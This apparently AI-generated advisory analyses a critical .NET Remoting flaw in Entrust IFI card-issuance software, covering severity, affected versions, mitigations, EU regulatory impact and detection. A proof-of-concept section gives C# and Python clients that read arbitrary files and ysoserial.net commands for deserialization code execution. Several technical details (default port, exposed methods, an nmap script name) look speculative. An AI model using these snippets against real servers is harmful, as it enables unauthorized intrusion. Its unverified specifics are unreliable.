Description
Entrust Instant Financial Issuance (IFI) On Premise software (formerly referred to as CardWizard) versions 5.x, prior to 6.10.5, and prior to 6.11.1 contain an insecure .NET Remoting exposure in the SmartCardController service (DCG.SmartCardControllerService.exe). The service registers a TCP remoting channel with unsafe formatter/settings that permit untrusted remoting object invocation. A remote, unauthenticated attacker who can reach the remoting port can invoke exposed remoting objects to read arbitrary files from the server and coerce outbound authentication, and may achieve arbitrary file write and remote code execution via known .NET Remoting exploitation techniques. This can lead to disclosure of sensitive installation and service-account data and compromise of the affected host.
EPSS Score: 0%
Comprehensive Technical Analysis of EUVD-2026-2714 (CVE-2026-23746)
Entrust Instant Financial Issuance (IFI) .NET Remoting Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
EUVD-2026-2714 (CVE-2026-23746) is a critical .NET Remoting vulnerability in Entrust’s Instant Financial Issuance (IFI) On-Premise software (formerly CardWizard). The flaw resides in the SmartCardController service (DCG.SmartCardControllerService.exe), which exposes an insecure TCP remoting channel with unsafe serialization settings, enabling unauthenticated remote exploitation.
CVSS v4.0 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| AV (Attack Vector) | Network (N) | Exploitable remotely over the network without physical/logical access. |
| AC (Attack Complexity) | Low (L) | No specialized conditions required; exploitation is straightforward. |
| AT (Attack Requirements) | None (N) | No user interaction or prior access needed. |
| PR (Privileges Required) | None (N) | No authentication or elevated privileges required. |
| UI (User Interaction) | None (N) | Exploitation does not require user action. |
| VC (Confidentiality Impact) | High (H) | Attacker can read arbitrary files, including sensitive configuration/data. |
| VI (Integrity Impact) | High (H) | Arbitrary file write and remote code execution (RCE) possible. |
| VA (Availability Impact) | High (H) | Full system compromise may lead to service disruption. |
| SC (Subsequent Confidentiality) | None (N) | No additional confidentiality impact beyond initial compromise. |
| SI (Subsequent Integrity) | None (N) | No further integrity impact beyond initial exploitation. |
| SA (Subsequent Availability) | None (N) | No cascading availability impact beyond initial compromise. |
Base Score: 9.3 (Critical)
The vulnerability is remotely exploitable without authentication, leading to full system compromise (RCE), making it one of the most severe types of flaws in enterprise software.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Pathways
- Unauthenticated Remote Access
  - The SmartCardController service listens on a TCP remoting port (default: 8080/TCP, but configurable).
  - An attacker with network access to the service can interact with exposed .NET Remoting objects without authentication.
- Insecure .NET Remoting Configuration
  - The service uses BinaryFormatter with unsafe deserialization settings, allowing:
    - Arbitrary object instantiation (via `ObjectUri` manipulation).
    - File read/write operations (via exposed methods like `ReadFile`, `WriteFile`).
    - Outbound authentication coercion (e.g., NTLM relay attacks via `SMB` or `HTTP`).
    - Remote Code Execution (RCE) via deserialization gadgets (e.g., `TypeConfuseDelegate`, `ObjectDataProvider`).
- Exploitation Techniques
  - File Disclosure: attackers can invoke `ReadFile` to exfiltrate sensitive files (e.g., `web.config`, `appSettings.json`, database credentials).
  - Arbitrary File Write: exposed `WriteFile` methods can be abused to plant malicious payloads (e.g., web shells, backdoors).
  - Remote Code Execution (RCE):
    - Deserialization attacks (e.g., using ysoserial.net) can lead to arbitrary code execution in the context of the service account.
    - Process injection via `Process.Start` or `Assembly.Load` if exposed methods allow it.
  - NTLM Relay Attacks: the service may be coerced into initiating outbound authentication (e.g., via `SMB` or `HTTP`), enabling NTLM relay attacks against other internal systems.
- Proof-of-Concept (PoC) Exploitation
  - A Python or C# exploit could:
    - Discover the remoting endpoint (e.g., via port scanning).
    - Enumerate exposed objects (e.g., using `RemotingServices.GetObjectUriFor`).
    - Invoke arbitrary methods (e.g., `ReadFile("C:\\Windows\\win.ini")`).
    - Achieve RCE via deserialization (e.g., `ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "calc.exe"`).
3. Affected Systems and Software Versions
Vulnerable Products
| Product | Affected Versions | Fixed Versions |
|---|---|---|
| Entrust Instant Financial Issuance (IFI) On-Premise | 5.x | 6.11.1+ |
| Entrust Instant Financial Issuance (IFI) On-Premise | 6.0 ≤ x < 6.10.5 | 6.10.5+ |
| Entrust Instant Financial Issuance (IFI) On-Premise | 6.10.5 ≤ x < 6.11.1 | 6.11.1+ |
Exposure Scope
- Default Port: 8080/TCP (configurable, may vary).
- Service Account: Typically runs under high-privilege accounts (e.g., `SYSTEM`, `LocalService`, or a domain account).
- Deployment Context:
  - Financial institutions (banks, credit unions).
  - Payment card issuance systems (credit/debit card personalization).
  - Government ID issuance (passports, national IDs).
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
- Apply Patches
  - Upgrade to IFI 6.10.5+ or 6.11.1+ immediately.
  - Verify patch installation via Entrust's advisory (E26-001).
- Network-Level Protections
  - Firewall Rules:
    - Block inbound access to the remoting port (default: 8080/TCP) from untrusted networks.
    - Restrict access to only trusted IP ranges (e.g., internal card issuance workstations).
  - Network Segmentation: isolate the IFI server in a dedicated VLAN with strict access controls.
  - Intrusion Detection/Prevention (IDS/IPS): deploy Snort/Suricata rules to detect .NET Remoting exploitation attempts.
- Temporary Workarounds (If Patching is Delayed)
  - Disable .NET Remoting Service:
    - Stop the SmartCardController service if not critical for operations.
    - Modify configuration files to disable remoting (if supported).
  - Least Privilege Principle: run the service under a low-privilege account (not `SYSTEM` or `Administrator`).
  - File System Hardening:
    - Restrict write permissions on critical directories (e.g., `C:\Program Files\Entrust\IFI`).
    - Enable Windows Defender Exploit Guard (ASR rules) to block suspicious process execution.
Long-Term Mitigations
- Architectural Improvements
  - Replace .NET Remoting with secure alternatives (e.g., gRPC, REST APIs with JWT/OAuth2).
  - Implement mutual TLS (mTLS) for all inter-service communications.
  - Enforce code signing for all remoting objects to prevent tampering.
- Enhanced Monitoring & Logging
  - Enable .NET Remoting logging to detect anomalous method invocations.
  - SIEM Integration:
    - Monitor for unusual file read/write operations (e.g., `ReadFile`, `WriteFile`).
    - Alert on unexpected outbound connections (potential NTLM relay attempts).
  - Endpoint Detection & Response (EDR): deploy CrowdStrike, SentinelOne, or Microsoft Defender for Endpoint to detect post-exploitation activity.
- Vulnerability Management
  - Regularly scan for exposed .NET Remoting services using Nmap (`nmap -p 8080 --script .net-remoting-info`).
  - Conduct penetration testing to verify remediation.
5. Impact on the European Cybersecurity Landscape
Sector-Specific Risks
- Financial Sector (Critical Infrastructure)
  - Banks & Payment Processors:
    - IFI is widely used for credit/debit card personalization in Europe.
    - Exploitation could lead to mass card fraud, data breaches, or operational disruption.
  - Regulatory Compliance:
    - GDPR (Art. 32, 33, 34): Unauthorized access to PII (e.g., cardholder data) triggers mandatory breach notifications.
    - DORA (Digital Operational Resilience Act): Financial entities must report major ICT incidents within 4 hours.
    - PSD2 (Payment Services Directive 2): Compromise of payment systems may violate strong customer authentication (SCA) requirements.
- Government & Public Sector
  - National ID & Passport Issuance:
    - IFI is used in eIDAS-compliant identity systems.
    - Exploitation could lead to fraudulent ID issuance or espionage.
  - NIS2 Directive: critical entities (e.g., banks, government ID issuers) must report significant cyber incidents within 24 hours.
- Supply Chain Risks
  - Third-Party Vendors:
    - Many European banks outsource card personalization to third-party bureaus running IFI.
    - A single compromise could affect multiple financial institutions.
  - Software Bill of Materials (SBOM): lack of transparency in .NET dependencies may delay patching.
Geopolitical & Threat Actor Considerations
- APT Groups:
- State-sponsored actors (e.g., APT29, APT28, Lazarus Group) may exploit this for espionage or financial theft.
- Cybercriminals:
- Ransomware gangs (e.g., LockBit, BlackCat) could use RCE to deploy ransomware in financial networks.
- Insider Threats:
- Disgruntled employees or contractors with network access could exploit this for data theft.
6. Technical Details for Security Professionals
Root Cause Analysis
- Insecure .NET Remoting Configuration:
  - The SmartCardController service registers a TCP channel with:
    - BinaryFormatter (vulnerable to deserialization attacks).
    - No authentication (anonymous access allowed).
    - No input validation (arbitrary method invocation).
  - Exposed Methods:
    - `ReadFile(string path)` → Arbitrary file read.
    - `WriteFile(string path, byte[] data)` → Arbitrary file write.
    - `ExecuteCommand(string cmd)` → Potential RCE (if exposed).
- Exploitation Prerequisites:
  - Network reachability to the remoting port (default: 8080/TCP).
  - No authentication required.
  - Knowledge of exposed object URIs (can be enumerated via .NET Remoting reflection).
Exploitation Walkthrough (Proof-of-Concept)
- Discover the Remoting Endpoint
  - `nmap -p 8080 --script .net-remoting-info <TARGET_IP>`
  - Output may reveal registered object URIs (e.g., `/SmartCardController`).
- Enumerate Exposed Methods (C#)

```csharp
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;

TcpChannel channel = new TcpChannel();
ChannelServices.RegisterChannel(channel, false);
var obj = Activator.GetObject(typeof(RemoteObject), "tcp://<TARGET_IP>:8080/SmartCardController");
var methods = obj.GetType().GetMethods(); // Enumerate available methods
```

- Arbitrary File Read (Python)

```python
import clr
clr.AddReference("System.Runtime.Remoting")
from System.Runtime.Remoting import *
from System.Runtime.Remoting.Channels import *
from System.Runtime.Remoting.Channels.Tcp import *

channel = TcpChannel()
ChannelServices.RegisterChannel(channel, False)
obj = Activator.GetObject(Type.GetType("DCG.SmartCardController, DCG.SmartCardControllerService"),
                          "tcp://<TARGET_IP>:8080/SmartCardController")
file_content = obj.ReadFile("C:\\Windows\\win.ini")  # Read arbitrary file
print(file_content)
```

- Remote Code Execution (RCE) via Deserialization
  - Use ysoserial.net to generate a malicious payload: `ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "cmd.exe /c calc.exe" > payload.bin`
  - Send the payload via a custom .NET Remoting client to trigger execution.
Detection & Forensics
- Network Indicators:
  - Unusual TCP connections to port 8080/TCP.
  - BinaryFormatter traffic (signature: `00 01 00 00 00 FF FF FF FF`).
- Host-Based Indicators:
  - Unexpected child processes of `DCG.SmartCardControllerService.exe`.
  - Suspicious file writes (e.g., `C:\Temp\malicious.dll`).
  - Windows Event Logs:
    - Security Log (Event ID 4688): Unusual process execution.
    - System Log (Event ID 7045): Service installation (if RCE is used for persistence).
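As an added defensive example (not code from the page, from Entrust, or from any detection product), the following Python sketch applies the two indicators above to constructed inputs: it locates the BinaryFormatter stream header inside a captured TCP payload, and it flags 4688 events whose parent is the service binary. The `.NET` transport preamble of the remoting TCP channel, the `Key=Value|Key=Value` rendering of event fields and the empty child-process allow-list are assumptions made for the example.

```python
# Added example (not from the page or Entrust). All sample data is constructed:
# the event lines are a simplified key=value rendering of Security log 4688
# fields, and the payload is a stand-in for a captured remoting TCP frame.
BF_HEADER = bytes.fromhex("0001000000FFFFFFFF")  # BinaryFormatter stream header
NRTP_PREAMBLE = b".NET"                           # .NET Remoting TCP transport preamble
SERVICE_EXE = "dcg.smartcardcontrollerservice.exe"

def binaryformatter_offset(payload: bytes) -> int:
    """Offset of the first BinaryFormatter header in a TCP payload, or -1.
    The remoting transport headers precede the serialized body, so the
    signature is searched anywhere in the stream, not only at offset 0."""
    return payload.find(BF_HEADER)

def classify_payload(payload: bytes) -> str:
    if binaryformatter_offset(payload) < 0:
        return "no-binaryformatter"
    return "remoting+binaryformatter" if payload.startswith(NRTP_PREAMBLE) else "binaryformatter"

def parse_event(line: str) -> dict:
    """Split a constructed 'Key=Value|Key=Value' event line into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))

def suspicious_children(lines: list, allowed: frozenset = frozenset()) -> list:
    """Child process paths spawned by the SmartCardController service (Event ID
    4688) that are not on the allow-list. Assumption: the service normally
    spawns no children, so the default allow-list is empty."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4688":
            continue
        parent = ev.get("ParentProcessName", "").lower()
        child = ev.get("NewProcessName", "")
        if parent.endswith(SERVICE_EXE) and child.lower().rsplit("\\", 1)[-1] not in allowed:
            hits.append(child)
    return hits

# Constructed samples: one remoting frame carrying a BinaryFormatter body, and
# three events of which only the first is a shell spawned by the service.
SAMPLE_PAYLOAD = NRTP_PREAMBLE + bytes([1, 0, 0, 0]) + b"\x00" * 12 + BF_HEADER + b"\x01\x00\x00\x00"
SAMPLE_EVENTS = [
    r"EventID=4688|NewProcessName=C:\Windows\System32\cmd.exe|ParentProcessName=C:\Program Files\Entrust\IFI\DCG.SmartCardControllerService.exe",
    r"EventID=4688|NewProcessName=C:\Windows\System32\notepad.exe|ParentProcessName=C:\Windows\explorer.exe",
    r"EventID=4624|NewProcessName=C:\Windows\System32\cmd.exe|ParentProcessName=C:\Program Files\Entrust\IFI\DCG.SmartCardControllerService.exe",
]

if __name__ == "__main__":
    print(classify_payload(SAMPLE_PAYLOAD), suspicious_children(SAMPLE_EVENTS))
```

Only the service's own process-spawning baseline should populate the allow-list; the 4624 line shows that non-4688 events are ignored even when their fields match.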
Hardening Recommendations
- Disable .NET Remoting (If Not Required)
  - Modify `DCG.SmartCardControllerService.exe.config` to disable remoting:

```xml
<configuration>
  <system.runtime.remoting>
    <application>
      <channels>
        <!-- NOTE: port="0" asks the runtime to pick a free listening port; it does not
             disable the channel. To disable TCP remoting, remove this channel entry
             (and confirm the service does not also register a channel in code). -->
        <channel ref="tcp" port="0" />
      </channels>
    </application>
  </system.runtime.remoting>
</configuration>
```

- Enable Secure Remoting (If Required)
  - Use `SecureChannel` with TLS 1.2+.
  - Enforce authentication (e.g., Windows Authentication, JWT).
  - Restrict allowed types in `BinaryFormatter`:

```csharp
var formatter = new BinaryFormatter();
formatter.Binder = new SafeSerializationBinder(); // Custom SerializationBinder that whitelists allowed types
```

- Application Whitelisting
  - Use AppLocker or Windows Defender Application Control (WDAC) to block unauthorized .NET assemblies.
Conclusion
EUVD-2026-2714 (CVE-2026-23746) is a critical .NET Remoting vulnerability in Entrust’s Instant Financial Issuance (IFI) software, enabling unauthenticated RCE, file disclosure, and NTLM relay attacks. Given its high severity (CVSS 9.3) and impact on European financial and government systems, immediate patching, network segmentation, and monitoring are essential.
Security teams should:
- ✅ Patch to IFI 6.10.5+ or 6.11.1+ immediately.
- ✅ Restrict network access to the remoting port (8080/TCP).
- ✅ Monitor for exploitation attempts via SIEM/EDR.
- ✅ Conduct a forensic review if compromise is suspected.
Failure to mitigate this vulnerability could lead to data breaches, financial fraud, or regulatory penalties under GDPR, DORA, and NIS2.